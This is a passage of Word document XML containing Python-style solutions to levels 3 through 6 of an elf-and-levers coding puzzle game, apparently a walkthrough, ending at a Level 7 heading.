        <w:t>levers.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED9B0DF" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">lollipop0 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lollipops.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10633A19" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveLeft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B897D0" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>sum = lever0.data() + 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A4F262" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>lever0.pull(sum)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F3820D" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveLeft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D10E81" w14:textId="7573264E" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D91624A" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19C93BA3" w14:textId="580199BB" w:rsidR="00D6316D" w:rsidRPr="00D6316D" w:rsidRDefault="0094724D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Level 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790E7931" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CAC11FB" w14:textId="507379A4" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">import elf, munchkins, levers, lollipops, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yeeters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, pits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603AA73E" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">lever0, lever1, lever2, lever3, lever4 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>levers.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452EE64A" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveLeft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33458CE2" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>lever4.pull("A string")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3A9871" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F6CE76" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>lever3.pull(True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5B738A" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626C338C" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>lever2.pull(666)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C026776" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>elf.moveUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3347FF65" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>lever1.pull([420,69])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1DA453" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4835EDCD" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>lever0.pull({"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ayy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" : "lmao", "here come" : "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> boy"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F0AFCE" w14:textId="3B4C4D3A" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793B90CB" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479565FA" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Level 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0518492A" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4975F020" w14:textId="7D2EBD12" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">import elf, munchkins, levers, lollipops, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yeeters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, pits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C89E054" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">lever0, lever1, lever2, lever3, lever4 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>levers.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606FD526" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveLeft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D50FC74" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>lever4.pull(lever4.data()+" concatenate")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F1CC53" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6538725A" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>my_answer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(wat):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4187DD9B" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return not wat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144D6744" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>lever3.pull(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>my_answer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(lever3.data()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787F5B04" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D394F3" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>lever2.pull(lever2.data()+1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780608B6" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A89378A" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>myList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = lever1.data()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2461B5" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>myList.append</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C5158D" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>lever1.pull(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>myList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED88FEB" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5516386F" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>lev0ans = lever0.data()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507FE326" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>lev0ans['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'] = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strvalue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553A0710" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>lever0.pull(lev0ans)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2DDDFC" w14:textId="0FBB79D9" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263E260B" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A9D8FA" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Level 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545C5382" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EF5ACC8" w14:textId="39462DEB" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">import elf, munchkins, levers, lollipops, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yeeters</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, pits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F27D2D" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">lever0 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>levers.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB8FF64" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ansCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = lever0.data()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2A6336" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getAns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkIt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272CFE30" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if type(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkIt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) == str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04203CAD" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkIt+checkIt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="63C46607" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if type(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkIt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) == bool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008B08B1" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return not </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkIt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="70D92239" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if type(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkIt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) == int:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5502E030" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkIt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>*2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5F8400" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if type(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkIt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) == list:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D57E9C9" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkItNew</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=[ i+1 for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkIt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B0B289" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkItNew</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75BE2EF9" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if type(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkIt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) == </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dict</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1CF44E" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkIt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">["a"] = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkIt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>["a"] + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD512E7" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>checkIt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1242F519" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC17702" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>lever0.pull(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getAns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ansCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FF40AB" w14:textId="74FC7279" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf.moveUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C07A68" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6860E21F" w14:textId="77777777" w:rsidR="0094724D" w:rsidRDefault="0094724D" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Level 7</w:t>
      </w:r>
    </w:p>
